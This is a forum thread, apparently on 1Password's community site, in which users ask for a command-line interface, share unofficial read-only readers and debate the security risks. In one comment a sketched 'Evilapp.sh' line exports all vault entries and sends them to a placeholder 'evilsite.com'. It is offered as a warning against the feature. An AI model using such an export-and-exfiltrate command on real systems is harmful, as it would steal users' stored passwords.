Command line utility
Comments
-
Warning No formatter is installed for the format ipb0
-
Warning No formatter is installed for the format ipb0
-
Warning No formatter is installed for the format ipb0
-
Warning No formatter is installed for the format ipb0
-
Warning No formatter is installed for the format ipb0
-
I wrote my own command line reader here: https://github.com/oggy/1pass . Standard disclaimers apply.
0 -
I wrote a command line reader here: https://github.com/oggy/1pass . Doesn't support writing because I didn't want to screw up my keychain, but I'd take patches if someone out there is adventurous enough.
0 -
Thanks for posting this, oggy! For those playing the home version of "Apps that Access 1Password Data Files", please be sure to read our recent blog post:
You have secrets; we don’t. Why our data format is public
The short version is that while we have to advise folks to never enter their 1Password Master Password into anything that isn’t 1Password, we have intentionally made our data format publicly available which means that such apps are inevitable. While we can’t endorse third-party apps, and indeed we have to advise against using them; their existence is still a Good Thing. They are proof that our openness about our data formats means that folks do not have to fear data lock-in. :)
0 -
Hi all,
I'd like to add my vote to this request as well please (unless it's already been fulfilled?) ... I would find this functionality immensely useful, as I am in Terminal the whole time ... managing remote servers with complex (1Password generated) passwords.
Cheers, Spencer
0 -
Thanks, Spencer! I'll pass your vote along to the developers.
0 -
Do more votes help? Add me to the list..
0 -
Thanks for letting us know you are interested as well! We really appreciate the feedback. Please keep it coming. :)
0 -
I've built an unofficial read-only command line interface for 1Password. It's a Python package, so you can install it by running
pip install 1passat the command line.There's more information here: https://pypi.python.org/pypi/1pass
The source code is here: https://github.com/georgebrock/1pass
This isn't officially sanctioned by AgileBits and like most free, open source software is provided without warranty, but it's working well for me and various friends and colleagues.
0 -
Thank you for producing and posting this, @georgebrock. :)
I feel it prudent to include our "standard disclaimer" here. From our "You have secrets; we don’t. Why our data format is public" blog post:
Third party apps and 1Password data
Let me jump to the what has prompted this article before returning to the virtues of publicly detailing our data format. Recently there’s been progress on third party tools and applications that can read 1Password data, and there are some important factors to consider about these tools:
- Third party tools for reading 1Password data do not reflect a “break” in 1Password. They, like 1Password, require your Master Password in order to read your data.
- We have to advise you to never enter your 1Password Master Password into anything that isn’t 1Password. We aren’t casting aspersions on the integrity or competence of any developers, but we simply can’t advise otherwise.
- Third party tools are “third party”. Although we may sometimes help them understand the details of our data format, they are entirely independent of AgileBits. The fact that we may maintain a good relationship with them is not an endorsement of what they produce.
- Third party tools exemplify the fact that there is no data lock in with 1Password.
The existence of third party tools for reading 1Password data has had people ask about the security implications of us being so open about our data format. Our openness is a good thing, and here’s why.
0 -
Bump. This would be super-useful functionality for me, a *nix systems administrator. Something where I could embed a 1pass reply into a shell script would be amazing - a real-world example might be ipmitool, which takes a password on the command-line:
ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate
If I could do stuff like this, you'd be able to count me as a rabid evangelist for use of 1password in technical and even automated deployment settings.
0 -
I know this is probably a utility that would only be used by we neckbeards who like command line interfaces, but man, I would use an official Agile CLI interface many, many times a day. Consider this another vote. (Also, hi, Kevin!)
0 -
I will definitely pass your votes along. Thanks for the additional feedback!
0 -
I'll add another (strong) request for a command line util.
0 -
This is the only barrier to my registering 1password
0 -
I'll make sure the developers know this. Thanks for your feedback, @bradleymccrorey! :)
0 -
Hello password masters,
After setting up a new web server with a whole list of starting SSH access, FTP info, db info, etc., having some kind of terminal shortcuts would be awesome.
1-up! :D
0 -
Thanks for getting in touch with us, @owntheweb :) It is a great suggestion that our developers have been looking at, it is just tricky to make sure we can do this in a secure manner.
In 1Password 4 for Mac, we've made it easier to access your information from within 1PasswordMini, which will be in the main toolbar. It is not 100% what you are looking for, but it is a step in the right direction :)
0 -
1PasswordMini is great but is definitively not the solution
what about action script
A simple use case is using ssh to connect to a host (without certificate)
1Password can act like opensssh and ask the first time with a modal dialog box to allow access to password XXX0 -
Why aren't any of the commenters seeing the main issue with this?
- You're asking that it be possible to access 1Password via the command line, without asking for the password (as long as 1Password is unlocked at the time).
Am I really the only one that sees the issue here?
Anyone?
I'll give you a hint:
Evilapp.sh: 1p --export '*' > /tmp/evil.txt; send evil.txt to evilsite.com
The same power given to your scripts would be given to all evil programs on your computer.
Consider this a -INFINITY negative vote from me to never add this feature.
Stick to the various command line tools that others have written above.
Unless it can be done securely somehow, it has no place in the official 1Password.
0 -
Hi @Uno_Lavoz,
Thanks for your feedback here - as Sara mentioned above, our developers are committed to finding a secure way to do this, if we do it at all. We certainly don't want any loopholes that might allow access for Evilapp :)
0 -
I don't think there is a secure way to do it. Doing it securely would mean having some sort of per-app-instance session-limited-permissions, but even that falls apart quickly:
- You could find the process-ID (PID) of the calling process, such as an instance of Terminal.app running a script that uses it, or similar.
- Then you check if that PID has been allowed during the current computing session. If not, pop up an Allow/Deny permission dialog (and a password prompt if 1P is locked at the moment).
- If they allow the action, it adds that PID to a list of allowed processes for the current compute session.
The problem then becomes that there's no way to distinguish Terminal.app with PID 12974 (allowed) from running good.sh or evil.sh. So after you've done your benign work, maybe some evil script will tag along and do its evil deeds by piggybacking off an allowed PID.
The only way around that would be to just point-blank pop up an Allow/Deny dialog on EVERY call to 1P's command-line binary. This would quickly get out of hand if a script requires 4-5 calls. But it's the only truly safe way: Ask people to verify EVERY action (and always show the source app that requested permission, along with the command line parameters provided).
0 -
Thanks for the additional followup, @Uno_Lavoz.
We're aware of all these things which is a big part of the reason we haven't moved forward yet. But we never say never. Who knows what the future may bring? :)
0 -
Something I'm considering adding to
1passis an option to have it run a command for you, substituting tokens like%uand%pfor your login information. @anotheral gave this example:ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate
I'm imagining an interface that looks more like this:
1pass --execute "ipmitool -U %u -P %p sol activate" foo-ipmi
1passwould prompt you for your master password, find thefoo-ipmilogin, fill in the username and password in the command, and run the complete command for you. It's secure, in so far as you have to type your master password each time you want to access data from your keychain, and it's convenient, because you don't have to invoke it multiple times to build a single command (which seems to be the reason people are requesting a CLI that doesn't require a password each time).I'm not looking for official sanction for
1passhere (@khad's caveat completely applies:1passisn't official, and you should definitely think carefully before typing your master password into anything that isn't the official app) , but I mention this because I wonder if this is the kind of interface that the 1Password team would consider sufficiently secure for an official CLI?0
